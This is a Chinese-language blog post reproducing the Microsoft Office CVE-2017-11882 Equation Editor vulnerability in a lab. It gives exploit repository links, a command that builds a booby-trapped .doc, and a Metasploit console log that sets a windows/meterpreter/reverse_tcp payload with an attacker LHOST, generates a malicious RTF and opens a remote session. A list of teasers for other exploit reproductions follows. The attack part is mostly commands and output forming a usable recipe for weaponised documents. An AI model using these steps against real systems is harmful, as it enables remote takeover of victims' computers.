off CVE-2017-11882漏洞復現

原創 曈曚 2020-05-20 14:34

CVE-2017-11882漏洞影響版本
office 2003
office 2007
office 2010
office 2013
office 2016
復現環境
win7
kali
office 2016
office2016分享鏈接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A
提取碼:d1lo
下載組件
下載
https://github.com/Ridter/CVE-2017-11882/
https://github.com/0x09AL/CVE-2017-11882-metasploit
將CVE-2017-11882.rb拷貝到目錄/usr/share/metasploit-framework/modules/exploits/windows/smb下
測試
製作一個彈出計算器的文檔
python Command109b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o 1.doc
在這裏插入圖片描述
將文檔放到靶機打開在這裏插入圖片描述
成功
使用msf復現

msf5 > search cve-2017-11882

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/office_ms17_11882  2017-11-15       manual     No     Microsoft Office CVE-2017-11882
   1  exploit/windows/smb/cve_2017_11882            2017-11-21       excellent  No     Microsoft Office Word Equation Editor RCE


msf5 > use exploit/windows/smb/cve_2017_11882 
msf5 exploit(windows/smb/cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/cve_2017_11882) > set LHOST 192.168.31.117
LHOST => 192.168.31.117
msf5 exploit(windows/smb/cve_2017_11882) > set URIPATH test
URIPATH => test
msf5 exploit(windows/smb/cve_2017_11882) > exploit 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.31.117:4444 
[*] Generating command with length 44
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Using URL: http://0.0.0.0:8080/test

在這裏插入圖片描述在這裏插入圖片描述
在這裏插入圖片描述
生成文檔
在這裏插入圖片描述
將文檔複製到靶機打開
在這裏插入圖片描述

msf5 exploit(windows/smb/cve_2017_11882) > sessions -i 1

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Apache solr xxe漏洞復現(CVE-2017-12629)

Apache solr xxe漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker syste

whojoe 2020-07-07 23:32:01

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker sy

whojoe 2020-07-07 23:32:01

Apache Solr rce復現(CVE-2019-0193)

Apache Solr rce復現(CVE-2019-0193)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 8.2.0 環境搭建 啓動docker systemctl start docker 獲取

whojoe 2020-07-07 23:32:01

(有下載鏈接)F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)前言漏洞詳情影響版本修復建議環境搭建漏洞復現參考文章 前言 漏洞詳情 F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、

whojoe 2020-07-06 23:41:30

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl start doc

whojoe 2020-07-06 23:00:48

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl s

whojoe 2020-07-06 23:00:48

weblogic CVE-2020-2555 反序列化RCE 復現

文章目錄前言0x01 漏洞說明0x02 影響版本0x03 漏洞利用0x04 注意的地方0x05 修復建議0x06 時間線0x07 參考鏈接 前言 本教程及工具僅供技術學習交流、請勿用於非法行爲、否則後果自負 0x01 漏洞說明

iptableskk 2020-07-06 21:25:57

Windows SMBv3 漏洞復現(CVE-2020-0796)

Windows SMBv3 漏洞復現(CVE-2020-0796)前言環境搭建漏洞復現參考文章 前言 漏洞介紹 微軟SMBv3 Client/Server遠程代碼執行漏洞CVE-2020-0796 影響範圍: Windows 10

whojoe 2020-07-06 05:35:41

Supervisord 遠程命令執行漏洞(CVE-2017-11610)

Supervisord 遠程命令執行漏洞(CVE-2017-11610) 一、漏洞介紹 Supervisord是一款用Python語言開發的管理後臺應用(服務)的工具,方便運維人員使用圖形化界面進行管理。 Supervisord曾

limb0 2020-07-05 19:14:36

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600)

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600) 一、漏洞介紹 2018年3月28日,Drupal官方發佈新補丁和安全公告,宣稱Drupal 6,7,8等多個子版本存在遠程代碼執行漏洞,攻

limb0 2020-07-05 19:14:36

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)前言影響編號環境搭建漏洞復現參考文章 前言 影響 Apache Tomcat = 6 7 <= Apache Tomcat <7.0.100

whojoe 2020-07-05 14:51:22

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Solr漏洞 CVE-2019-17558漏洞復現

CVE-2019-17558漏洞復現前言 Apache Solr 是一個開源的搜索服務器。 cve-2019-17558 Apache Solr 代碼注入漏洞 漏洞影響版本5.0.0 到 8.3.1 漏洞影響:用戶可以注入自定

小陈classmate 2020-07-05 14:10:42

Drupal 遠程代碼執行漏洞(CVE-2019-6339)

Drupal 遠程代碼執行漏洞(CVE-2019-6339) 一、漏洞介紹 Drupal core是Drupal社區所維護的一套用PHP語言開發的免費、開源的內容管理系統。 Drupal core 7.62之前的7.x版本、8.6

limb0 2020-07-04 12:23:17

CVE-2020-1948補丁繞過 Apache Dubbo 遠程代碼執行漏洞

漏洞背景 2020年06月23日, 360CERT監測發現 Apache Dubbo 官方 發佈了 Apache Dubbo 遠程代碼執行 的風險通告,該漏洞編號爲 CVE-2020-1948,漏洞等級:高危。 Apache Du

AmyBaby囍 2020-07-04 11:53:11